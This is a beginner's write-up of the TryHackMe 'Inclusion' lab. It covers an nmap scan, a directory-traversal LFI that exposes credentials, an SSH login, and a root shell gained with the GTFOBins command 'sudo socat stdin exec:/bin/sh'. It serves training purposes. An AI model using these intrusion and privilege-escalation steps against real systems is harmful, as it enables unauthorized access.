A write-up for an easy TryHackMe room for beginners


Inclusion | TryHackMe

What is the user flag?

First, we will enumerate our target.

❯ nmap -sV
Nmap scan report for
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 16.98 seconds

As we can see, two ports are open on our target machine, port 22 for ssh and port 80 with http. Let's see what we have on port 80.


That's a pretty cute blog right there. As we are interested in LFI, let's view its details.


Um...We have this very well presented blog about LFI attacks. It seems to include details about Directory Traversal along with its example. Lets give it a try, shall we?


Well well well, what do we have here ;)

A commented out user:passwd pair is present. I wonder where it could be used. SSH maybe?

falconfeast@inclusion:~$ ls
articles user.txt
falconfeast@inclusion:~$ cat user.txt

What is the root flag?

Now its time to escalate priviledges. Lets see what we can run as root.

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat

I think GTFOBins may have something that can help us.

sudo socat stdin exec:/bin/sh

Lets plug that into the terminal.

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
cd /root
cat root.txt